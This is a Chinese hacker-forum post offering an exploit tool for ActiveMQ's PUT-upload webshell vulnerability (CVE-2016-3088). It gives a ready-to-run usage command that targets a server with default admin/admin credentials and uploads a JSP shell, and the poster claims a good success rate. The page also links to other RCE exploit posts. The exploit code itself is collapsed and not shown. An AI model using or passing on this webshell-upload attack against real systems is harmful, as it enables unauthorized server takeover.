POC ActiveMQ的PUT 上传getshellExP CVE-2016-3088

主题发起人 Shacker
开始时间 09 13, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 13, 2024

JavaScript:

# ActiveMQ的PUT 上传getshellExP CVE-2016-3088

Author:CF_HB

时间：2016年6月8日

漏洞参考地址: http://zone.wooyun.org/content/27737

exp使用例子：
原理参见zone里白帽子刺刺的分析，上传shell用法如下：
    python ActiveMQExP.py -url http://192.168.18.133:8161/ -user admin -pass admin -shell D://shell.jsp

经过几何牛各种测试，命中率应该及格了，欢迎大家继续测试和反馈bug。

POC ActiveMQExPV1.0

POC CVE-2021-26295

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC Shiro 550反序列化(CVE-2016-4437)包含EXP Shacker 09 10, 2024 POC/?Day
	POC [CVE-2020-2883]-T3反序列化 Shacker 09 13, 2024 POC/?Day
	POC CVE-2020-17518 Shacker 09 10, 2024 POC/?Day
	POC [CVE-2020-2551]-IIOP反序列化 Shacker 09 13, 2024 POC/?Day
	POC VMware vCenter Server未授权RCE漏洞（CVE-2021-21972） Shacker 09 13, 2024 POC/?Day

主页
论坛
POC/?Day

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部